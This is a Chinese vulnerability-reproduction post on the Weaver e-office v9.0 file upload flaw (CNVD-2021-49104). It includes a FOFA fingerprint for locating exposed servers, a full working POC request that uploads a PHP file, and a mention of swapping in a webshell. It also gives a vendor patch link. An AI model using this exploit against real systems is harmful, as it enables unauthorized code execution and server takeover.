0x01 漏洞简介

泛微e-office是泛微旗下的一款标准协同移动办公平台。由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包,最终实现任意代码执行。

影响版本:泛微 e-office v9.0

0x02  FOFA指纹

app="泛微-EOffice"

 0x03 漏洞复现

作者自己搭建的环境 直接运行exe文件安装,设置端口,ip即可

下载链接:https://pan.baidu.com/s/1OPxpdgT1RZfVGsVsX7u7ag 
提取码:wars

访问设置好的ip:port    如下图片即搭建成功  默认用户名admin 无密码

在当前界面刷新一下,进行抓包,改造请求包

POC

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host:x.x.x.x:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 189
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg

<?php phpinfo(test);?>

--e64bdf16c554bbc109cecef6451c26a4--

发包之后,出现如上图情况,访问    /images/logo/logo-eoffice.php

发现上传成功,当然也可以是上传一句话,通过蚁剑连接

0x04漏洞复现

厂商已提供漏洞修补方案,建议用户下载使用:

http://v10.e-office.cn/eoffice9update/safepack.zip

CNVD-2021-49104——泛微E-Office文件上传漏洞相关推荐

  1. 泛微E-Office最新文件上传漏洞(CNVD-2021-49104)

    0x00  漏洞介绍 泛微e-office是泛微旗下的一款标准协同移动办公平台.主要面向中小企业.该漏洞是由于 e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包, ...

  2. 泛微e-cology9前台文件上传漏洞复现

    目录 1.前言 2.漏洞概述 3.漏洞原理 4.影响版本 5.漏洞等级 6.漏洞复现

  3. CatfishCMS文件上传漏洞(CNVD-2021-42363)

    本博客已搬迁至:https://n0puple.github.io/ 此处不再更新文章 本文仅用于技术讨论与研究,文中的实现方法切勿应用在任何违法场景.如因涉嫌违法造成的一切不良影响,本文作者概不负责 ...

  4. 代码审计--CatfishCMS文件上传漏洞

    声明:本公众号大部分文章来黑白之间安全团队成员的实战经验以及学习积累,文章内公布的漏洞或者脚本都来自互联网,未经授权,严禁转载. 请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作 ...

  5. 泛微E-Office文件上传漏洞(CNVD-2021-49104)

    泛微E-Office文件上传漏洞(CNVD-2021-49104) 漏洞描述 泛微e-office是泛微旗下的一款标准协同移动办公平台.由于 e-office 未能正确处理上传模块中的用户输入,攻击者 ...

  6. (php)泛微E-Office文件上传漏洞(原理分析+复现+批量检测)

    漏洞描述 泛微e-office是泛微旗下的一款标准协同移动办公平台. CNVD-2021-49104 由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包 ...

  7. 泛微OA V8 SQL注入漏洞和文件上传漏洞

    fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中 ...

  8. 某office前台任意文件上传漏洞分析

    X微e-office的那个前台任意文件上传漏洞已经被爆出一段时间了,相关的漏洞利用脚本甚至是漏洞批量利用脚本 也有很多.在这里根据系统代码结合POC来分析一下这个漏洞点. 定位漏洞点 [私信回复&qu ...

  9. php上传漏洞绕过gd库,jQuery File Upload任意文件上传漏洞

    事件背景 jQuery是一个快速.简洁的JavaScript框架,是继Prototype之后又一个JavaScript代码库(或JavaScript框架).jQuery File Upload一个jQ ...

  10. 【burpsuite安全练兵场-服务端8】文件上传漏洞-7个实验(全)

    前言: 介绍: 博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章). 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edus ...

最新文章

  1. python成长之路——第四天
  2. C++类对象的拷贝构造函数(转载)
  3. Java基础day2
  4. 珠宝管理系统java,基于jsp的珠宝首饰进销存管理系统-JavaEE实现珠宝首饰进销存管理系统 - java项目源码...
  5. 微信获取位置 转化为 高德地图 位置 地址
  6. 怎么用程序实现调用Android手机的拍照功能
  7. android 后台极光,Android 使用极光推送集成、出现问题和后台保活,android极光
  8. android分享微信获取资源失败怎么办,android 调用系统分享微信失败:获取资源失败...
  9. 站在Stay老司机肩膀上分析Retrofit
  10. 网页上的资料怎么打印出来?
  11. 【历史上的今天】2 月 28 日:阿帕网退役;Quintus 收购 Mustang;同步电流磁芯存储器获得专利
  12. 怎么把录音转文字?快把这些方法收好
  13. 学习笔记:min-width和min-height
  14. Codeforces C. Spy Syndrome 2
  15. USB转串口(rj45)使用secureCRT调试设备
  16. require https rid: 5f30fa30-76a72ecb-495cddc1
  17. (ssl1232)雷达覆盖(normal)
  18. 解决端口被占用问题,安装MySQL出现端口被占用
  19. 统计软件 matlab,MATLAB 软件基础及统计应用教程
  20. JAVA毕设项目深州市特色蜜桃产业电子商务系统(java+VUE+Mybatis+Maven+Mysql)

热门文章

  1. 超分辨率图像重建技术简要
  2. java excel 逐行读取_java利用poi读取Excel文件
  3. JavaScript脚本延迟加载的方式有哪些
  4. bat ren命令修改文件后缀名
  5. 为什么现在计算机所有专业的研究生基本都搞机器学习和深度学习,国内真的需要这么多会人工智能的人才吗?...
  6. 宽带连接常见错误 解决
  7. kubernetes之Pod控制器
  8. 【C语言】log,对数函数的使用
  9. 阿里 Arthas 读书笔记
  10. VHDL语言入门帮助